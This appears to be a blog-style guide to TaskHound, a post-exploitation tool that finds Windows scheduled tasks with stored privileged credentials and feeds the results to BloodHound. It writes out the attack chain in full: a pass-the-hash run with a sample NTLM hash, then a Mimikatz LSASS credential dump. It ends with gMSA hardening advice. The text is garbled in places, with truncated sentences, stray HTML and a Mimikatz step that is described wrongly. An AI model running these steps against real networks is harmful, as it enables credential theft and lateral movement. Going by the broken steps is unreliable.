Listen to this Post

Introduction:
In the critical aftermath of a successful initial breach, attackers and ethical pentesters alike engage in a relentless hunt for stored credentials to escalate privileges and move laterally. A primary target in Windows environments has always been Scheduled Tasks configured with privileged user contexts, but manually enumerating and analyzing these tasks has been a notoriously tedious and error-prone process. This guide delves into the revolutionary open-source tool, TaskHound, which automates this hunt over SMB, parses task XML, and integrates with BloodHound to visually map attack paths, fundamentally changing the post-exploitation landscape.
Learning Objectives:
- Understand the critical attack vector of Scheduled Tasks with stored credentials and how to exploit them.
- Master the installation, configuration, and execution of TaskHound for comprehensive network enumeration.
- Learn to interpret TaskHound’s output and integrate its findings into BloodHound for advanced attack path analysis.
You Should Know:
- The Anatomy of a Windows Scheduled Task Credential Attack
Scheduled Tasks can be configured to run with the stored credentials of a privileged user. If an attacker compromises a machine, these credentials can be extracted from memory or disk, allowing for lateral movement and privilege escalation. The core of the attack lies in identifying every single task across the network that possesses these stored credentials.
Verified Windows Command:
Manually query scheduled tasks on a local system (PowerShell)
Get-ScheduledTask | Where-Object {$<em>.Principal.UserId -like "Admin"} | Get-ScheduledTaskInfo | Format-Table TaskName, State, @{Name="User"; Expression={$</em>.Principal.UserId}}
Use schtasks.exe for basic remote enumeration
schtasks /query /s <TARGET_HOST> /fo LIST /v
Step-by-step guide:
The `Get-ScheduledTask` PowerShell cmdlet is the native way to interact with the Task Scheduler. The first command filters for tasks where the executing user (Principal.UserId) contains “Admin”. The older `schtasks.exe` utility can perform basic remote enumeration (/s <TARGET_HOST>). However, these methods are slow, do not systematically parse the underlying XML for credentials, and are cumbersome to run across an entire domain, highlighting the need for an automated tool like TaskHound.
2. Installing and Configuring TaskHound for Your Engagement
TaskHound is a Go-based tool, making it easy to deploy on any system used for a penetration test. Its primary requirement is valid domain credentials with read access to the SMB shares on target systems to retrieve the task definitions.
Verified Linux Command (Compiling from Source):
Clone the TaskHound repository from ProSec's GitHub git clone https://github.com/ProSec/TaskHound.git cd TaskHound Install dependencies and build the binary go mod tidy go build -o taskhound main.go Verify the build ./taskhound -h
Step-by-step guide:
After cloning the repository, use the `go mod tidy` command to fetch all necessary dependencies. The `go build` command compiles the source code into an executable binary named taskhound. Running the tool with the `-h` flag confirms a successful build and displays the help menu, showing all available command-line options like target specification and output formats.
3. Executing a Network-Wide Scheduled Task Hunt
The power of TaskHound is in its ability to efficiently scan multiple targets. You provide it a list of hosts, and it automates the SMB connection and XML parsing process.
Verified Linux Command (Basic TaskHound Execution):
Run TaskHound against a list of targets from a file ./taskhound -t targets.txt -d YOURDOMAIN.COM -u username -p 'Password123!' -o taskhound_results.json Using pass-the-hash for authentication ./taskhound -t targets.txt -d YOURDOMAIN.COM -u username -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 -o taskhound_results.json
Step-by-step guide:
The `-t` flag specifies a file containing a list of target IP addresses or hostnames. The -d, -u, and `-p` flags provide domain, username, and password for authentication. Crucially, TaskHound supports pass-the-hash (-H) with an NTLM hash, which is invaluable during a penetration test where you may not have the plaintext password. The `-o` flag writes the results to a JSON file for later analysis.
4. Decoding the XML: Finding Stored Credentials
Each Scheduled Task’s configuration is stored as an XML file. The critical element for attackers is the `
Verified Windows Command (Manual XML Inspection):
Export a specific task to XML for manual analysis schtasks /query /tn "\Microsoft\Windows\ExampleTask" /xml > C:\temp\task.xml Then, inspect the <UserId> and <LogonType> fields within the XML.
Step-by-step guide:
This manual method uses `schtasks /query /tn
- From Data to Domination: Feeding TaskHound into BloodHound
TaskHound’s most powerful feature is its ability to output data in a format compatible with BloodHound’s “Custom Attack Path” feature. This visualizes how a compromised account with access to a task-hosting machine can lead to the compromise of high-privilege accounts.
Verified Linux Command (BloodHound Import):
After running TaskHound, use the generated JSON with BloodHound 1. Start BloodHound and the ingest interface. neo4j console & bloodhound --no-sandbox <ol> <li>In BloodHound, go to "Upload Data" and select the `taskhound_results.json` file.
Step-by-step guide:
First, ensure the Neo4j database (which backs BloodHound) is running with neo4j console. Then, launch the BloodHound UI. Navigate to the “Upload Data” tab and drag-and-drop or select the `taskhound_results.json` file generated by TaskHound. BloodHound will process this data, and the new attack paths will appear in your graph, showing clear relationships from your initial foothold to the privileged accounts found by TaskHound.
6. Exploiting the Findings: Dumping Credentials from Memory
Once TaskHound identifies a machine running a task with privileged stored credentials, the next step is to compromise that host and extract the credentials. A common method is dumping the LSASS process memory.
Verified Windows Command (Mimikatz for LSASS Dump):
Dump LSASS memory to a file for offline processing (requires Admin privileges) privilege::debug sekurlsa::minidump C:\temp\lsass.dmp sekurlsa::logonPasswords full
Step-by-step guide:
This classic Mimikatz sequence first enables the `SeDebugPrivilege` (privilege::debug), which is required to access another process’s memory. The `sekurlsa::minidump` command creates a dump file of the LSASS process. Finally, `sekurlsa::logonPasswords` parses this dump file to extract plaintext passwords, Kerberos tickets, and NTLM hashes of logged-on users, including the account running the scheduled task.
7. Mitigation and Hardening: Securing Your Scheduled Tasks
The defensive counterpart is to eliminate the dangerous configurations that TaskHound exploits. This involves using more secure service accounts like Group Managed Service Accounts (gMSAs) and applying the principle of least privilege.
Verified Windows Command (PowerShell for gMSA):
Install the AD PowerShell module and create a new gMSA Install-WindowsFeature RSAT-AD-PowerShell Import-Module ActiveDirectory New-ADServiceAccount -Name "MyWebApp-gMSA" -DNSHostName "MyWebApp-gMSA.mydomain.com" -PrincipalsAllowedToRetrieveManagedPassword "WEB_SERVERS$" Test that a member server can retrieve the gMSA password Test-ADServiceAccount MyWebApp-gMSA
Step-by-step guide:
gMSAs manage their own passwords automatically, which are stored securely in the LSA and are not plaintext in the task XML. This command sequence, run from a Domain Controller, creates a new gMSA (New-ADServiceAccount) and specifies which computer accounts (PrincipalsAllowedToRetrieveManagedPassword) are allowed to retrieve its password. The `Test-ADServiceAccount` cmdlet verifies the configuration from a member server.
What Undercode Say:
- Automation is Non-Negotiable: Manual post-exploitation enumeration is dead. Tools like TaskHound that automate the discovery of complex, distributed attack vectors represent the new baseline for both red and blue teams.
- Context is King: Finding a credential is one thing; understanding its place in the kill chain is another. The direct integration with BloodHound is a game-changer, transforming raw data into an actionable strategic map.
The release of TaskHound signifies a maturation in the offensive security toolscape. It’s not just another vulnerability scanner; it’s a force multiplier that addresses a specific, painful, and high-impact phase of penetration testing. By systematically uncovering and visualizing this specific misconfiguration, it pushes defenders to adopt more secure practices like gMSAs and forces a re-evaluation of legacy automation scripts. This tool closes the gap between knowing a theoretical weakness and being able to rapidly and reliably exploit it at scale.
Prediction:
The automated, graph-based attack path discovery pioneered by tools like BloodHound and now extended by TaskHound will become the standard for all post-exploitation frameworks. We predict that within two years, EDR and SIEM systems will begin integrating similar “assumed-clear” pathing analytics proactively, allowing blue teams to simulate an attacker’s view of their network and hard against these exact techniques before a breach occurs. The cat-and-mouse game will escalate to the graph database layer, with attackers using tools like TaskHound to find paths and defenders using graph analysis to sever them preemptively.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Prosec Networks – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


